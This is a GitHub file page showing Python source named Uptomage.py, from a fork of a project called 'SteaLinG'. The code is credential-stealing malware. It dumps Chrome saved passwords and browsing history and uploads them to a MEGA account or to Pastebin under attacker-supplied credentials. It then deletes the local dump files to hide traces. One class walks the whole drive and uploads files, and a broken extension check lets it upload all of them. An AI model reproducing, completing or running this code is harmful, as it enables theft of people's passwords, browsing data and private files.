forked from De3vil/SteaLinG
-
Notifications
You must be signed in to change notification settings - Fork 1
/
Uptomage.py
79 lines (74 loc) · 2.28 KB
/
Uptomage.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
# -*- coding: utf-8 '-*-'
# Author: Abdulrahman Mohammed (De3vil)
# Don't touch my code, it's art
#+==============================
from mega import Mega
from os import chdir , remove , getcwd , environ , walk , path , system
from Steal_PS import Main
from modules_version2.Moud.History import DumpHistory
from modules_version2.Moud.BeastBincr import BCR
class upToMaGePAS:
def __init__(self):
self.pa = getcwd()
self.Mega_up = Mega()
def up(self , email , password):
mido = Main()
mido.main()
path = chdir(self.pa)
remove("ChromeData.db")
paTh = chdir(environ["temp"])
self.Mega_up.login(email=email , password=password)
self.Mega_up.upload("pass.txt")
remove("pass.txt")
class upToMaGeHIS:
def __init__(self):
self.Mega_up = Mega()
def up(self , email , password):
self.Mega_up.login(email=email , password=password)
mido = DumpHistory()
mido.Mido()
paTh = chdir(environ["temp"])
self.Mega_up.upload("dump_history.txt")
remove("dump_history.txt")
class FilesSend:
def __init__(self):
self.Mega_up = Mega()
def Extension(self,extension):
self.extensionn = extension
self.ss = self.extensionn.split(",")
def uploading(self,email , password ):
self.Mega_up.login(email=email , password=password)
for x , y , z in walk("\\"):
for name in z:
self.path = path.join(x,name)
self.mido = self.path.split('.')[-1]
if self.mido in self.ss:
pass
file = self.Mega_up.upload(self.path)
class UptoBastebinPass:
def __init__(self):
self.pa = getcwd()
def up(self , key , username , Password):
mido = Main()
mido.main()
past = BCR()
path = chdir(self.pa)
remove("ChromeData.db")
paTh = chdir(environ["temp"])
with open("pass.txt" , "r") as reading:
txt = reading.readlines()
past.bastbincr(key=key, username=username, Password=Password, data=txt)
remove("pass.txt")
class UptoBastebinHS:
def __init__(self):
self.pa = getcwd()
def up(self , key , username , Password):
mido = DumpHistory()
mido.Mido()
past = BCR()
path = chdir(self.pa)
paTh = chdir(environ["temp"])
with open("dump_history.txt" , "r") as reading:
txt = reading.readlines()
past.bastbincr(key=key, username=username, Password=Password, data=txt)
remove("dump_history.txt")